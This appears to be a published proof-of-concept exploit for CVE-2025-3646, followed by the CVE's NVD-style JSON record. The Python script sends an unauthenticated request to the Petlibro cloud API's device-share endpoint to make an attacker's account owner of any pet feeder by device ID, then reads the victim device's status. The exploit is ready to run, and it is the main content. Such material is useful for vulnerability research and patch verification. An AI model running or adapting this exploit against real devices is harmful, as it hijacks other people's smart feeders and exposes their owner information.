CVE-2025-3646

import requests import json # CVE-2025-3646 PoC - Petlibro Smart Pet Feeder Authorization Bypass # Target: Petlibro Smart Pet Feeder Platform <= 1.7.31 # Vulnerability: Missing authorization check in device share API TARGET_DEVICE_ID = "TARGET_DEVICE_ID_HERE" # Target device ID ATTACKER_USER_ID = "[email protected]" # Attacker's account API_BASE_URL = "https://api.petlibro.com" # API endpoint def exploit_device_share(): """ Exploit the authorization bypass vulnerability to add attacker as device owner """ # Step 1: Prepare the malicious share request share_payload = { "device_id": TARGET_DEVICE_ID, "share_to": ATTACKER_USER_ID, "permission": "owner" } # Step 2: Send the unauthorized share request # The API does not verify if the requester has permission to share the device headers = { "Content-Type": "application/json", "User-Agent": "PetlibroApp/1.7.31" } try: response = requests.post( f"{API_BASE_URL}/api/device/share", json=share_payload, headers=headers, timeout=10 ) print(f"[*] Request sent to device share API") print(f"[*] Status Code: {response.status_code}") print(f"[*] Response: {response.text}") if response.status_code == 200: result = response.json() if result.get("success"): print("[+] SUCCESS: Attacker added as device owner!") print(f"[+] Gained unauthorized access to device: {TARGET_DEVICE_ID}") return True print("[-] Exploitation failed") return False except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") return False def verify_access(): """ Verify the attacker now has access to the victim's device """ headers = { "User-Agent": "PetlibroApp/1.7.31", "X-User-Email": ATTACKER_USER_ID } try: response = requests.get( f"{API_BASE_URL}/api/device/{TARGET_DEVICE_ID}/status", headers=headers, timeout=10 ) if response.status_code == 200: print("[+] VERIFIED: Attacker can now view device information") print(f"[+] Device data: {response.text}") return True return False except requests.exceptions.RequestException as e: print(f"[-] Verification failed: {e}") return False if __name__ == "__main__": print("=" * 60) print("CVE-2025-3646 PoC - Petlibro Device Share Authorization Bypass") print("=" * 60) if exploit_device_share(): verify_access() print("=" * 60)

{"cve": {"id": "CVE-2025-3646", "sourceIdentifier": "[email protected]", "published": "2026-01-04T00:15:43.783", "lastModified": "2026-02-03T17:42:15.710", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Petlibro Smart Pet Feeder Platform versions up to 1.7.31 contains an authorization bypass vulnerability that allows unauthorized users to add users as shared owners to any device by exploiting missing permission checks. Attackers can send requests to the device share API to gain unauthorized access to devices and view owner information without proper authorization validation."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-306"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:petlibro:petlibro:*:*:*:*:-:*:*:*", "versionEndIncluding": "1.7.31", "matchCriteriaId": "0B604E0A-05A3-46E0-8558-FF3F00F5EF0D"}]}]}], "references": [{"url": "https://bobdahacker.com/blog/petlibro", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.vulncheck.com/advisories/petlibro-smart-pet-feeder-platform-through-authorization-bypass-via-device-share-api", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}